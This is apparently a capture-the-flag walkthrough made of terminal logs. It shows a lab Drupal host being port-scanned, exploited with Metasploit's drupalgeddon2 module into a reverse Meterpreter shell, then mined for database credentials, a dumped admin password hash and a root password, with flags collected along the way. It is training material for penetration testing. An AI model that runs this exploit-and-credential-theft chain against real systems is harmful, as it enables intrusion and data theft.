.
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182] └──╼ $cat ports.nmap # Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182 Nmap scan report for 10.150.150.182 Host is up (0.086s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0) | ssh-hostkey: | 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA) | 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA) |_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519) 80/tcp open http nginx 1.4.0 (Ubuntu) | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT | ETag: "264-5abd7039b3849" | Accept-Ranges: bytes | Content-Length: 612 | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | <!DOCTYPE html> | <html> | <head> | <title>Welcome to nginx!</title> | <style> | body { | width: 35em; | margin: 0 auto; | font-family: Tahoma, Verdana, Arial, sans-serif; | </style> | </head> | <body> | <h1>Welcome to nginx!</h1> | <p>If you see this page, the nginx web server is successfully installed and | working. Further configuration is required.</p> | <p>For online documentation and support please refer to | href="http://nginx.org/">nginx.org</a>.<br/> | Commercial support is available at | href="http://nginx.com/">nginx.com</a>.</p> | <p><em>Thank you for using nginx.</em></p> | </body> | </html> | HTTPOptions: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST | Content-Length: 0 | Connection: close | Content-Type: text/html | RTSPRequest: | HTTP/1.1 400 Bad Request | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Content-Length: 299 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> | <html><head> | <title>400 Bad Request</title> | </head><body> | <h1>Bad Request</h1> | <p>Your browser sent a request that this server could not understand.<br /> | </p> | <hr> | <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address> |_ </body></html> |_http-title: Welcome to nginx! |_http-server-header: nginx 1.4.0 (Ubuntu) 8080/tcp open http-proxy nginx 1.4.0 (Ubuntu) | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Mon, 29 Aug 2022 09:00:40 GMT | Server: nginx 1.4.0 (Ubuntu) | Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT | ETag: "264-5abd7039b3849" | Accept-Ranges: bytes | Content-Length: 612 | Vary: Accept-Encoding | Connection: close | Content-Type: text/html | <!DOCTYPE html> | <html> | <head> | <title>Welcome to nginx!</title> | <style> | body { | width: 35em; | margin: 0 auto; | font-family: Tahoma, Verdana, Arial, sans-serif; | </style> | </head> | <body> | <h1>Welcome to nginx!</h1> | <p>If you see this page, the nginx web server is successfully installed and |--snipp-- \x2080</address>\n</body></ SF:html>\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds ┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
cat freegift.html
<html>
<head>
<title>Redeem your free gift</title>
</head>
<body>
<!– FLAG4=3bbff3b43813668741aa213b2cd0cff29c0c7542 –>
</body>
</html>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
MariaDB [(none)]>
MariaDB [drupaldb]> select * from ptd_users;
select * from ptd_users;
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | administrador | $S$Dobcr9v53WJdz6GsuhauWnwKNTm1pZpId6/rNl6psZwj2prE3d9V | chilakiller@ptd.local | | | NULL | 1596317328 | 1643552710 | 1643551677 | 1 | America/Mexico_City | | 0 | chilakiller@ptd.local | b:0; |
+—–+—————+———————————————————+———————–+——-+———–+——————+————+————+————+——–+———————+———-+———+———————–+——+
2 rows in set (0.00 sec)
MariaDB [drupaldb]>
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
user1@chilakiller:/etc/openvpn/client/.config$ cat .5OBdDQ80Py
cat .5OBdDQ80Py
hUqJ2
ChilaKill3s_Tru3_L0v3R
user1@chilakiller:/etc/openvpn/client/.config$
su root
pw = ChilaKill3s_Tru3_L0v3R
root@chilakiller:~# cat FLAG2.txt
cat FLAG2.txt
ccc61a1d18a937cc3db531a5216a04a805d54762
root@chilakiller:/var/www/html/restaurante# find / -name “FLAG1.txt”
find / -name “FLAG1.txt”
find: ‘/run/user/1000/gvfs’: Permission denied
find: ‘/proc/4683/task/4683/net’: Invalid argument
find: ‘/proc/4683/net’: Invalid argument
/var/www/html/test-site/test-2/FLAG1.txt
root@chilakiller:/var/www/html/restaurante# cat /var/www/html/test-site/test-2/FLAG1.txt
<rante# cat /var/www/html/test-site/test-2/FLAG1.txt
ed93e58c308d60f49e97e559ab557b86add97f44
root@chilakiller:/var/www/html/restaurante#
root@chilakiller:/var/www/html/restaurante# hostnamectl hostnamectl Static hostname: chilakiller Icon name: computer-vm Chassis: vm Machine ID: c8677bebac964d43bed5ebe1af1caaa6 Boot ID: 907f69a447f04a8782bde75417cec04a Virtualization: vmware Operating System: Debian GNU/Linux 9 (stretch) Kernel: Linux 4.9.0-13-amd64 Architecture: x86-64 root@chilakiller:/var/www/html/restaurante#
Author : Puckiestyle